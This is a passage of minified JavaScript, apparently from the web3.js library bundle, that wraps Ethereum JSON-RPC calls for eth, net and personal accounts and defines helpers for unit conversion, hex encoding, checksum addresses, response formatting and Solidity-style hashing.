                            ]
                        });
                    });
                }, t.getFilterLogs = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "hex"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getFilterLogs",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getLogs = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "filter"
                        ], [
                            t
                        ]), e.send({
                            method: "eth_getLogs",
                            params: [
                                t
                            ]
                        });
                    });
                }, t.getWork = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_getWork",
                            params: []
                        });
                    });
                }, t.submitWork = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes8",
                            "bytes32",
                            "bytes32"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_submitWork",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.submitHashrate = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "bytes32",
                            "bytes32"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_submitHashrate",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getFeeHistory = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        i.validator.validate([
                            "hex",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]);
                        for (const e of o)i.validator.validate([
                            "number"
                        ], [
                            e
                        ]);
                        return e.send({
                            method: "eth_feeHistory",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getPendingTransactions = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_pendingTransactions",
                            params: []
                        });
                    });
                }, t.requestAccounts = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_requestAccounts",
                            params: []
                        });
                    });
                }, t.getChainId = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_chainId",
                            params: []
                        });
                    });
                }, t.getProof = function(e, t, r, o) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "bytes32[]",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r,
                            o
                        ]), e.send({
                            method: "eth_getProof",
                            params: [
                                t,
                                r,
                                o
                            ]
                        });
                    });
                }, t.getNodeInfo = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "web3_clientVersion",
                            params: []
                        });
                    });
                }, t.createAccessList = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "blockNumberOrTag"
                        ], [
                            r
                        ]), e.send({
                            method: "eth_createAccessList",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                };
            },
            1181: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.personalRpcMethods = t.netRpcMethods = t.ethRpcMethods = void 0;
                const s = o(r(9298));
                t.ethRpcMethods = s;
                const a = o(r(9960));
                t.netRpcMethods = a;
                const u = o(r(6745));
                t.personalRpcMethods = u;
            },
            9960: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isListening = t.getPeerCount = t.getId = void 0, t.getId = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_version",
                            params: []
                        });
                    });
                }, t.getPeerCount = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_peerCount",
                            params: []
                        });
                    });
                }, t.isListening = function(e) {
                    return r(this, void 0, void 0, function*() {
                        return e.send({
                            method: "net_listening",
                            params: []
                        });
                    });
                };
            },
            6745: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ecRecover = t.sign = t.signTransaction = t.sendTransaction = t.importRawKey = t.lockAccount = t.unlockAccount = t.newAccount = t.getAccounts = void 0, t.getAccounts = (e)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_listAccounts",
                            params: []
                        });
                    }), t.newAccount = (e, t)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_newAccount",
                            params: [
                                t
                            ]
                        });
                    }), t.unlockAccount = (e, t, n, i)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_unlockAccount",
                            params: [
                                t,
                                n,
                                i
                            ]
                        });
                    }), t.lockAccount = (e, t)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_lockAccount",
                            params: [
                                t
                            ]
                        });
                    }), t.importRawKey = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_importRawKey",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.sendTransaction = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_sendTransaction",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.signTransaction = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_signTransaction",
                            params: [
                                t,
                                n
                            ]
                        });
                    }), t.sign = (e, t, n, i)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_sign",
                            params: [
                                t,
                                n,
                                i
                            ]
                        });
                    }), t.ecRecover = (e, t, n)=>r(void 0, void 0, void 0, function*() {
                        return e.send({
                            method: "personal_ecRecover",
                            params: [
                                t,
                                n
                            ]
                        });
                    });
            },
            6325: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5529: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            2453: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            2856: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            6877: (e, t)=>{
                "use strict";
                var r, n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ETH_DATA_FORMAT = t.DEFAULT_RETURN_FORMAT = t.FMT_BYTES = t.FMT_NUMBER = void 0, function(e) {
                    e.NUMBER = "NUMBER_NUMBER", e.HEX = "NUMBER_HEX", e.STR = "NUMBER_STR", e.BIGINT = "NUMBER_BIGINT";
                }(r = t.FMT_NUMBER || (t.FMT_NUMBER = {})), function(e) {
                    e.HEX = "BYTES_HEX", e.UINT8ARRAY = "BYTES_UINT8ARRAY";
                }(n = t.FMT_BYTES || (t.FMT_BYTES = {})), t.DEFAULT_RETURN_FORMAT = {
                    number: r.BIGINT,
                    bytes: n.HEX
                }, t.ETH_DATA_FORMAT = {
                    number: r.HEX,
                    bytes: n.HEX
                };
            },
            9779: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            1517: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8223: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            4205: (e, t)=>{
                "use strict";
                var r, n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.HardforksOrdered = t.BlockTags = void 0, (n = t.BlockTags || (t.BlockTags = {})).EARLIEST = "earliest", n.LATEST = "latest", n.PENDING = "pending", n.SAFE = "safe", n.FINALIZED = "finalized", (r = t.HardforksOrdered || (t.HardforksOrdered = {})).chainstart = "chainstart", r.frontier = "frontier", r.homestead = "homestead", r.dao = "dao", r.tangerineWhistle = "tangerineWhistle", r.spuriousDragon = "spuriousDragon", r.byzantium = "byzantium", r.constantinople = "constantinople", r.petersburg = "petersburg", r.istanbul = "istanbul", r.muirGlacier = "muirGlacier", r.berlin = "berlin", r.london = "london", r.altair = "altair", r.arrowGlacier = "arrowGlacier", r.grayGlacier = "grayGlacier", r.bellatrix = "bellatrix", r.merge = "merge", r.capella = "capella", r.shanghai = "shanghai";
            },
            9970: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(9779), t), i(r(6325), t), i(r(2453), t), i(r(2856), t), i(r(5529), t), i(r(6877), t), i(r(4205), t), i(r(1517), t), i(r(8223), t), i(r(2196), t), i(r(8887), t), i(r(8173), t), i(r(1040), t), i(r(5640), t), i(r(1436), t), i(r(4933), t);
            },
            2196: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8887: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TypedArray = void 0, t.TypedArray = Object.getPrototypeOf(Uint8Array);
            },
            8173: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            1040: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            5640: function(e, t) {
                "use strict";
                var r = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BaseProvider = void 0;
                const n = Symbol.for("web3/base-provider");
                class i {
                    static isWeb3Provider(e) {
                        return e instanceof i || Boolean(e && e[n]);
                    }
                    get [n]() {
                        return !0;
                    }
                    send(e, t) {
                        this.request(e).then((e)=>{
                            t(null, e);
                        }).catch((e)=>{
                            t(e);
                        });
                    }
                    sendAsync(e) {
                        return r(this, void 0, void 0, function*() {
                            return this.request(e);
                        });
                    }
                }
                t.Web3BaseProvider = i;
            },
            1436: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BaseWallet = void 0, t.Web3BaseWallet = class extends Array {
                    constructor(e){
                        super(), this._accountProvider = e;
                    }
                };
            },
            4933: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            4108: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ChunkResponseParser = void 0;
                const n = r(5071);
                t.ChunkResponseParser = class {
                    constructor(e, t){
                        this.eventEmitter = e, this.autoReconnect = t;
                    }
                    clearQueues() {
                        "function" == typeof this._clearQueues && this._clearQueues();
                    }
                    onError(e) {
                        this._clearQueues = e;
                    }
                    parseResponse(e) {
                        const t = [];
                        return e.replace(/\}[\n\r]?\{/g, "}|--|{").replace(/\}\][\n\r]?\[\{/g, "}]|--|[{").replace(/\}[\n\r]?\[\{/g, "}|--|[{").replace(/\}\][\n\r]?\{/g, "}]|--|{").split("|--|").forEach((e)=>{
                            let r, i = e;
                            this.lastChunk && (i = this.lastChunk + i);
                            try {
                                r = JSON.parse(i);
                            } catch (e) {
                                return this.lastChunk = i, this.lastChunkTimeout && clearTimeout(this.lastChunkTimeout), void (this.lastChunkTimeout = setTimeout(()=>{
                                    this.autoReconnect || (this.clearQueues(), this.eventEmitter.emit("error", new n.InvalidResponseError({
                                        id: 1,
                                        jsonrpc: "2.0",
                                        error: {
                                            code: 2,
                                            message: "Chunk timeout"
                                        }
                                    })));
                                }, 15e3));
                            }
                            clearTimeout(this.lastChunkTimeout), this.lastChunk = void 0, r && t.push(r);
                        }), t;
                    }
                };
            },
            7086: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.toChecksumAddress = t.toWei = t.fromWei = t.toBigInt = t.toNumber = t.toHex = t.toAscii = t.hexToAscii = t.fromAscii = t.asciiToHex = t.hexToString = t.toUtf8 = t.hexToUtf8 = t.stringToHex = t.fromUtf8 = t.utf8ToHex = t.hexToNumberString = t.fromDecimal = t.numberToHex = t.toDecimal = t.hexToNumber = t.hexToBytes = t.bytesToHex = t.bytesToUint8Array = t.ethUnitMap = void 0;
                const n = r(3687), i = r(5487), o = r(7345), s = r(5071), a = BigInt(10), u = (e)=>a ** BigInt(e);
                t.ethUnitMap = {
                    noether: BigInt("0"),
                    wei: BigInt(1),
                    kwei: u(3),
                    Kwei: u(3),
                    babbage: u(3),
                    femtoether: u(3),
                    mwei: u(6),
                    Mwei: u(6),
                    lovelace: u(6),
                    picoether: u(6),
                    gwei: u(9),
                    Gwei: u(9),
                    shannon: u(9),
                    nanoether: u(9),
                    nano: u(9),
                    szabo: u(12),
                    microether: u(12),
                    micro: u(12),
                    finney: u(15),
                    milliether: u(15),
                    milli: u(15),
                    ether: u(18),
                    kether: u(21),
                    grand: u(21),
                    mether: u(24),
                    gether: u(27),
                    tether: u(30)
                }, t.bytesToUint8Array = (e)=>{
                    if (o.validator.validate([
                        "bytes"
                    ], [
                        e
                    ]), e instanceof Uint8Array) return e;
                    if (Array.isArray(e)) return new Uint8Array(e);
                    if ("string" == typeof e) return o.utils.hexToUint8Array(e);
                    throw new s.InvalidBytesError(e);
                };
                const { uint8ArrayToHexString: c } = o.utils;
                t.bytesToHex = (e)=>c((0, t.bytesToUint8Array)(e)), t.hexToBytes = (e)=>"string" == typeof e && "0x" !== e.slice(0, 2).toLowerCase() ? (0, t.bytesToUint8Array)(`0x${e}`) : (0, t.bytesToUint8Array)(e), t.hexToNumber = (e)=>(o.validator.validate([
                        "hex"
                    ], [
                        e
                    ]), o.utils.hexToNumber(e)), t.toDecimal = t.hexToNumber, t.numberToHex = (e, t)=>{
                    "bigint" != typeof e && o.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    let r = o.utils.numberToHex(e);
                    return t && (r.startsWith("-") || r.length % 2 != 1 ? r.length % 2 == 0 && r.startsWith("-") && (r = "-0x0".concat(r.slice(3))) : r = "0x0".concat(r.slice(2))), r;
                }, t.fromDecimal = t.numberToHex, t.hexToNumberString = (e)=>(0, t.hexToNumber)(e).toString(), t.utf8ToHex = (e)=>{
                    o.validator.validate([
                        "string"
                    ], [
                        e
                    ]);
                    let r = e.replace(/^(?:\u0000)/, "");
                    return r = r.replace(/(?:\u0000)$/, ""), (0, t.bytesToHex)((new TextEncoder).encode(r));
                }, t.fromUtf8 = t.utf8ToHex, t.stringToHex = t.utf8ToHex, t.hexToUtf8 = (e)=>(0, i.bytesToUtf8)((0, t.hexToBytes)(e)), t.toUtf8 = (e)=>"string" == typeof e ? (0, t.hexToUtf8)(e) : (o.validator.validate([
                        "bytes"
                    ], [
                        e
                    ]), (0, i.bytesToUtf8)(e)), t.hexToString = t.hexToUtf8, t.asciiToHex = (e)=>{
                    o.validator.validate([
                        "string"
                    ], [
                        e
                    ]);
                    let t = "";
                    for(let r = 0; r < e.length; r += 1){
                        const n = e.charCodeAt(r).toString(16);
                        t += n.length % 2 != 0 ? `0${n}` : n;
                    }
                    return `0x${t}`;
                }, t.fromAscii = t.asciiToHex, t.hexToAscii = (e)=>new TextDecoder("ascii").decode((0, t.hexToBytes)(e)), t.toAscii = t.hexToAscii, t.toHex = (e, r)=>{
                    if ("string" == typeof e && (0, o.isAddress)(e)) return r ? "address" : `0x${e.toLowerCase().replace(/^0x/i, "")}`;
                    if ("boolean" == typeof e) return r ? "bool" : e ? "0x01" : "0x00";
                    if ("number" == typeof e) return r ? e < 0 ? "int256" : "uint256" : (0, t.numberToHex)(e);
                    if ("bigint" == typeof e) return r ? "bigint" : (0, t.numberToHex)(e);
                    if ("object" == typeof e && e) return r ? "string" : (0, t.utf8ToHex)(JSON.stringify(e));
                    if ("string" == typeof e) {
                        if (e.startsWith("-0x") || e.startsWith("-0X")) return r ? "int256" : (0, t.numberToHex)(e);
                        if ((0, o.isHexStrict)(e)) return r ? "bytes" : e;
                        if ((0, o.isHex)(e) && !(0, o.isInt)(e)) return r ? "bytes" : `0x${e}`;
                        if (!Number.isFinite(e)) return r ? "string" : (0, t.utf8ToHex)(e);
                    }
                    throw new s.HexProcessingError(e);
                }, t.toNumber = (e)=>{
                    if ("number" == typeof e) return e;
                    if ("bigint" == typeof e) return e >= Number.MIN_SAFE_INTEGER && e <= Number.MAX_SAFE_INTEGER ? Number(e) : e;
                    if ("string" == typeof e && (0, o.isHexStrict)(e)) return (0, t.hexToNumber)(e);
                    try {
                        return (0, t.toNumber)(BigInt(e));
                    } catch (t) {
                        throw new s.InvalidNumberError(e);
                    }
                }, t.toBigInt = (e)=>{
                    if ("number" == typeof e) return BigInt(e);
                    if ("bigint" == typeof e) return e;
                    if ("string" == typeof e && (0, o.isHex)(e)) return BigInt(e);
                    throw new s.InvalidNumberError(e);
                }, t.fromWei = (e, r)=>{
                    const n = t.ethUnitMap[r];
                    if (!n) throw new s.InvalidUnitError(r);
                    const i = String((0, t.toNumber)(e)), o = n.toString().length - 1;
                    if (o <= 0) return i.toString();
                    const a = i.padStart(o, "0"), u = a.slice(0, -o), c = a.slice(-o).replace(/\.?0+$/, "");
                    return "" === u ? `0.${c}` : "" === c ? u : `${u}.${c}`;
                }, t.toWei = (e, r)=>{
                    o.validator.validate([
                        "number"
                    ], [
                        e
                    ]);
                    const n = t.ethUnitMap[r];
                    if (!n) throw new s.InvalidUnitError(r);
                    const [i, a] = String("string" != typeof e || (0, o.isHexStrict)(e) ? (0, t.toNumber)(e) : e).split(".").concat(""), u = BigInt(`${i}${a}`) * n, c = n.toString().length - 1, l = Math.min(a.length, c);
                    return 0 === l ? u.toString() : u.toString().padStart(l, "0").slice(0, -l);
                }, t.toChecksumAddress = (e)=>{
                    if (!(0, o.isAddress)(e, !1)) throw new s.InvalidAddressError(e);
                    const r = e.toLowerCase().replace(/^0x/i, ""), a = (0, t.bytesToHex)((0, n.keccak256)((0, i.utf8ToBytes)(r)));
                    if ((0, o.isNullish)(a) || "0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470" === a) return "";
                    let u = "0x";
                    const c = a.replace(/^0x/i, "");
                    for(let e = 0; e < r.length; e += 1)parseInt(c[e], 16) > 7 ? u += r[e].toUpperCase() : u += r[e];
                    return u;
                };
            },
            3065: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.format = t.convert = t.convertScalarValue = t.isDataFormat = void 0;
                const n = r(5071), i = r(9970), o = r(7345), s = r(7086), a = r(7151), u = r(2557), c = r(7541), { parseBaseType: l } = o.utils;
                t.isDataFormat = (e)=>"object" == typeof e && !(0, o.isNullish)(e) && "number" in e && "bytes" in e;
                const d = (e, t, r = [])=>{
                    let n, i = Object.assign({}, e);
                    for (const e of t){
                        if (i.oneOf && n) {
                            const e = r.find(function(e) {
                                return this === e[0];
                            }, null != n ? n : "");
                            e && e[0] === n && (i = i.oneOf[e[1]]);
                        }
                        if (!i.properties && !i.items) return;
                        if (i.properties) i = i.properties[e];
                        else if (i.items && i.items.properties) {
                            const t = i.items.properties;
                            if (!t) return;
                            i = t[e];
                        } else i.items && (0, o.isObject)(i.items) ? i = i.items : i.items && Array.isArray(i.items) && (i = i.items[parseInt(e, 10)]);
                        i && e && (n = e);
                    }
                    return i;
                };
                t.convertScalarValue = (e, t, r)=>{
                    try {
                        const { baseType: o, baseTypeSize: a } = l(t);
                        if ("int" === o || "uint" === o) switch(r.number){
                            case i.FMT_NUMBER.NUMBER:
                                return Number((0, s.toBigInt)(e));
                            case i.FMT_NUMBER.HEX:
                                return (0, s.numberToHex)((0, s.toBigInt)(e));
                            case i.FMT_NUMBER.STR:
                                return (0, s.toBigInt)(e).toString();
                            case i.FMT_NUMBER.BIGINT:
                                return (0, s.toBigInt)(e);
                            default:
                                throw new n.FormatterError(`Invalid format: ${String(r.number)}`);
                        }
                        if ("bytes" === o) {
                            let t;
                            switch(a ? "string" == typeof e ? t = (0, u.padLeft)(e, 2 * a) : e instanceof Uint8Array && (t = (0, c.uint8ArrayConcat)(new Uint8Array(a - e.length), e)) : t = e, r.bytes){
                                case i.FMT_BYTES.HEX:
                                    return (0, s.bytesToHex)((0, s.bytesToUint8Array)(t));
                                case i.FMT_BYTES.UINT8ARRAY:
                                    return (0, s.bytesToUint8Array)(t);
                                default:
                                    throw new n.FormatterError(`Invalid format: ${String(r.bytes)}`);
                            }
                        }
                    } catch (t) {
                        return e;
                    }
                    return e;
                }, t.convert = (e, r, n, i, s = [])=>{
                    var a, u;
                    if (!(0, o.isObject)(e) && !Array.isArray(e)) return (0, t.convertScalarValue)(e, null == r ? void 0 : r.format, i);
                    const c = e;
                    for (const [e, l] of Object.entries(c)){
                        n.push(e);
                        const h = d(r, n, s);
                        if ((0, o.isNullish)(h)) delete c[e], n.pop();
                        else if ((0, o.isObject)(l)) (0, t.convert)(l, r, n, i), n.pop();
                        else {
                            if (Array.isArray(l)) {
                                let d = h;
                                if (void 0 !== (null == h ? void 0 : h.oneOf) && h.oneOf.forEach((t, r)=>{
                                    var n, i;
                                    !Array.isArray(null == h ? void 0 : h.items) && ("object" == typeof l[0] && "object" === (null === (n = null == t ? void 0 : t.items) || void 0 === n ? void 0 : n.type) || "string" == typeof l[0] && "object" !== (null === (i = null == t ? void 0 : t.items) || void 0 === i ? void 0 : i.type)) && (d = t, s.push([
                                        e,
                                        r
                                    ]));
                                }), (0, o.isNullish)(null == d ? void 0 : d.items)) {
                                    delete c[e], n.pop();
                                    continue;
                                }
                                if ((0, o.isObject)(d.items) && !(0, o.isNullish)(d.items.format)) {
                                    for(let r = 0; r < l.length; r += 1)c[e][r] = (0, t.convertScalarValue)(l[r], null === (a = null == d ? void 0 : d.items) || void 0 === a ? void 0 : a.format, i);
                                    n.pop();
                                    continue;
                                }
                                if (!Array.isArray(null == d ? void 0 : d.items) && "object" === (null === (u = null == d ? void 0 : d.items) || void 0 === u ? void 0 : u.type)) {
                                    for (const e of l)(0, t.convert)(e, r, n, i, s);
                                    n.pop();
                                    continue;
                                }
                                if (Array.isArray(null == d ? void 0 : d.items)) {
                                    for(let r = 0; r < l.length; r += 1)c[e][r] = (0, t.convertScalarValue)(l[r], d.items[r].format, i);
                                    n.pop();
                                    continue;
                                }
                            }
                            c[e] = (0, t.convertScalarValue)(l, h.format, i), n.pop();
                        }
                    }
                    return c;
                }, t.format = (e, r, i)=>{
                    let s;
                    s = (0, o.isObject)(r) ? (0, a.mergeDeep)({}, r) : Array.isArray(r) ? [
                        ...r
                    ] : r;
                    const u = (0, o.isObject)(e) ? e : o.utils.ethAbiToJsonSchema(e);
                    if (!u.properties && !u.items && !u.format) throw new n.FormatterError("Invalid json schema for formatting");
                    return (0, t.convert)(s, u, [], i);
                };
            },
            3561: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getStorageSlotNumForLongString = t.soliditySha3Raw = t.soliditySha3 = t.encodePacked = t.processSolidityEncodePackedArgs = t.keccak256 = t.keccak256Wrapper = t.sha3Raw = t.sha3 = void 0;
                const n = r(3687), i = r(5487), o = r(5071), s = r(7345), a = r(7086), u = r(2557), c = "0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470";
                t.sha3 = (e)=>{
                    let t;
                    t = "string" == typeof e ? e.startsWith("0x") && (0, s.isHexStrict)(e) ? (0, a.hexToBytes)(e) : (0, i.utf8ToBytes)(e) : e;
                    const r = (0, a.bytesToHex)((0, n.keccak256)(t));
                    return r === c ? void 0 : r;
                }, t.sha3Raw = (e)=>{
                    const r = (0, t.sha3)(e);
                    return (0, s.isNullish)(r) ? c : r;
                }, t.keccak256Wrapper = (e)=>{
                    let t;
                    return t = "bigint" == typeof e || "number" == typeof e ? (0, i.utf8ToBytes)(e.toString()) : Array.isArray(e) ? new Uint8Array(e) : "string" != typeof e || (0, s.isHexStrict)(e) ? (0, a.bytesToUint8Array)(e) : (0, i.utf8ToBytes)(e), (0, a.bytesToHex)((0, n.keccak256)(t));
                }, t.keccak256 = t.keccak256Wrapper;
                const l = (e, t)=>{
                    const r = /^(\d+).*$/.exec(e.slice(t));
                    return r ? parseInt(r[1], 10) : 0;
                }, d = (e)=>e.toString(2).length, h = (e, t)=>{
                    const r = t.toString();
                    if ("string" === e) {
                        if ("string" == typeof t) return (0, a.utf8ToHex)(t);
                        throw new o.InvalidStringError(t);
                    }
                    if ("bool" === e || "boolean" === e) {
                        if ("boolean" == typeof t) return t ? "01" : "00";
                        throw new o.InvalidBooleanError(t);
                    }
                    if ("address" === e) {
                        if (!(0, s.isAddress)(r)) throw new o.InvalidAddressError(r);
                        return r;
                    }
                    const n = ((e)=>e.startsWith("int[") ? `int256${e.slice(3)}` : "int" === e ? "int256" : e.startsWith("uint[") ? `uint256'${e.slice(4)}` : "uint" === e ? "uint256" : e)(e);
                    if (e.startsWith("uint")) {
                        const e = l(n, 4);
                        if (e % 8 || e < 8 || e > 256) throw new o.InvalidSizeError(r);
                        const t = (0, a.toNumber)(r);
                        if (d(t) > e) throw new o.InvalidLargeValueError(r);
                        if (t < BigInt(0)) throw new o.InvalidUnsignedIntegerError(r);
                        return e ? (0, u.leftPad)(t.toString(16), e / 8 * 2) : t.toString(16);
                    }
                    if (e.startsWith("int")) {
                        const t = l(n, 3);
                        if (t % 8 || t < 8 || t > 256) throw new o.InvalidSizeError(e);
                        const i = (0, a.toNumber)(r);
                        if (d(i) > t) throw new o.InvalidLargeValueError(r);
                        return i < BigInt(0) ? (0, u.toTwosComplement)(i.toString(), t / 8 * 2) : t ? (0, u.leftPad)(i.toString(16), t / 4) : i.toString(16);
                    }
                    if ("bytes" === n) {
                        if (r.replace(/^0x/i, "").length % 2 != 0) throw new o.InvalidBytesError(r);
                        return r;
                    }
                    if (e.startsWith("bytes")) {
                        if (r.replace(/^0x/i, "").length % 2 != 0) throw new o.InvalidBytesError(r);
                        const t = l(e, 5);
                        if (!t || t < 1 || t > 64 || t < r.replace(/^0x/i, "").length / 2) throw new o.InvalidBytesError(r);
                        return (0, u.rightPad)(r, 2 * t);
                    }
                    return "";
                };
                t.processSolidityEncodePackedArgs = (e)=>{
                    const [t, r] = ((e)=>{
                        if (Array.isArray(e)) throw new Error("Autodetection of array types is not supported.");
                        let t, r;
                        return "object" == typeof e && ("t" in e || "type" in e) && ("v" in e || "value" in e) ? (t = "t" in e ? e.t : e.type, r = "v" in e ? e.v : e.value) : (t = (0, a.toHex)(e, !0), r = (0, a.toHex)(e), t.startsWith("int") || t.startsWith("uint") || (t = "bytes")), !t.startsWith("int") && !t.startsWith("uint") || "string" != typeof r || /^(-)?0x/i.test(r) || (r = (0, a.toBigInt)(r)), [
                            t,
                            r
                        ];
                    })(e);
                    return Array.isArray(r) ? r.map((e)=>h(t, e).replace("0x", "")).join("") : h(t, r).replace("0x", "");
                }, t.encodePacked = (...e)=>`0x${Array.prototype.slice.call(e).map(t.processSolidityEncodePackedArgs).join("").toLowerCase()}`, t.soliditySha3 = (...e)=>(0, t.sha3)((0, t.encodePacked)(...e)), t.soliditySha3Raw = (...e)=>(0, t.sha3Raw)((0, t.encodePacked)(...e)), t.getStorageSlotNumForLongString = (e)=>(0, t.sha3)(`0x${("number" == typeof e ? e.toString() : e).padStart(64, "0")}`);
            },
            9634: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
